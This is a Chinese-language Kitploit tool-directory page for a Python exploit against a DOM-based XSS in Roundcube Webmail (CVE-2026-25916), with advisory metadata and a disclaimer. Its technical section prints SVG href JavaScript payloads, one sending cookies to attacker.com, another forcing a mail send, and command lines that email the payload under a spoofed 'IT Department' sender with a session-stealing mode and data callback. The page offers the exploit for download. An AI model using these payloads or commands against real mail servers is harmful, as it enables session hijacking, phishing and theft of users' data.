Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute — Python 漏洞利用程序,针对 Roundcube Webmail 中基于 DOM 的 XSS(CVE-2026-25916),通过 SVG href 属性实现会话劫持,并借助精心构造的电子邮件进行数据窃取。 | Kitploit
工具/GitHubGitHub/mbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全电子邮件安全
GitHubmbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute

CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute

Python 漏洞利用程序,针对 Roundcube Webmail 中基于 DOM 的 XSS(CVE-2026-25916),通过 SVG href 属性实现会话劫持,并借助精心构造的电子邮件进行数据窃取。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
316个月前尚未审核

CVE-2026-25916: Roundcube Webmail DOM XSS 漏洞利用

📋 漏洞利用信息

漏洞利用标题: Roundcube Webmail 通过 SVG href 实现 DOM XSS(CVE-2026-25916)
作者: Mohammed Idrees Banyamer
联系方式: GitHub @mbanyamer | Instagram @banyamer_security
国家: 约旦
日期: 2026年2月9日
CVE: CVE-2026-25916
类型: 基于 DOM 的跨站脚本攻击(XSS)
平台: Web 应用程序
测试环境: Roundcube 1.6.8,Ubuntu 22.04
CVSS 评分: 6.1(中危)

🚨 法律免责声明

⚠️ 警告: 此漏洞利用仅用于教育和授权测试目的。
仅可在您拥有或已获得明确书面许可的系统上使用。
作者对任何滥用或非法行为不承担任何责任。

📖 漏洞描述

Roundcube Webmail 1.6.9 之前的版本在 SVG 处理中存在基于 DOM 的 XSS 漏洞。该应用程序未能正确清理 SVG 元素中的 href 和 xlink:href 属性,从而允许通过特制电子邮件执行 JavaScript。

受影响版本: Roundcube Webmail < 1.6.9
修复版本: 1.6.9(提交 26d7677)
CWE: CWE-79 - 网页生成过程中输入的不当中和
攻击向量: 通过电子邮件远程攻击
影响: 会话劫持、账户接管、数据泄露

🔧 技术细节

该漏洞存在于 rcube_washtml.php 中,其中 SVG 元素中的 href 属性未得到正确验证:

root@kitploit:~
<!-- 易受攻击的 SVG 元素 -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">

```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
root@kitploit:~
python3 cve-2026-25916.py \
  -s smtp.gmail.com \
  -p 587 \
  -u [email protected] \
  -w app_password \
  -r [email protected] \
  -t session_steal \
  --callback https://yourserver.com/collect \
  --subject "Security Alert" \
  --from-name "IT Department"
下载工具